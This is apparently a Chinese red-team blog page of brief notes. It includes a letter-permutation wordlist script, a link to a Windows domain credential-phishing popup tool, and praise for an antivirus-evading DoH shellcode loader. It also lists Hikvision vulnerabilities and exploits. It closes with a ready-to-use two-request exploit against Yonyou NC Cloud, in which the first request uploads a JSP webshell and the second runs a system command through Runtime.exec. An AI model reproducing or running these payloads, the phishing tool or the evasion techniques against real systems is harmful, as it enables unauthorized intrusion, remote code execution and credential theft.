Quan

WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
python生成m到n位字母全排列的代码
每次用每次都得去GPT那生成一次,太费劲了,记录一下
import itertools
import string

# 打开文件并准备写入
with open('output.txt', 'w') as f:
    # 从长度为 1 到 5 的字符串
    for length in range(1, 6):
        # 使用 itertools.product 生成所有可能的排列
        for combination in itertools.product(string.ascii_lowercase, repeat=length):
            # 将每个排列组合成字符串并写入文件
            f.write(''.join(combination) + '\n')
http://redteam.wang
内网渗透
Windows域内钓鱼弹框
还蛮不错的,很逼真
https://github.com/Rvn0xsy/GetWindowsCredentials
终端对抗
基于DoH的无特征shellcode加载器实现
对于分离免杀爱好者来说,他提出的这种新的方法很实用。列出三个之后代码可以修改的地方
1.自实现一些对称加密算法,例如作者爆改了RC4算法
2.修改编码,作者将Base64编码进行了修改
3.这个我觉得很牛逼所有网络通信均采用自封装模块实现,这个对于我来说非常有吸引力,回来持续研究。
https://mp.weixin.qq.com/s/f7-OvziarneKhVklT888Lg
威胁情报
海康总结
海康威视八大漏洞汇总包括一些默认密码等
海康威视综合安防平台后渗透利用工具 数据解密与用户账号密码替换
海康威视iVMS 综合安防前台任意文件上传
海康威视综合安防管理平台任意文件上传 POC&EXP直接拿EXP打,美滋滋
海康威视综合安防管理平台远程命令执行漏洞(Fastjson)
不出网的Fastjson利用
记一次海康AK凭证泄漏下的利用
http://redteam.wang
威胁情报
用友NC Cloud前台远程命令执行漏洞
本质看上去应该还是个文件上传
先上传:
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 253
Content-Type: application/x-www-form-urlencoded

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/823780482.jsp"]}

再执行:
POST /823780482.jsp?error=bsh.Interpreter HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())
https://mp.weixin.qq.com/s/VJ_hY0YrqKPCBbjltZxOWw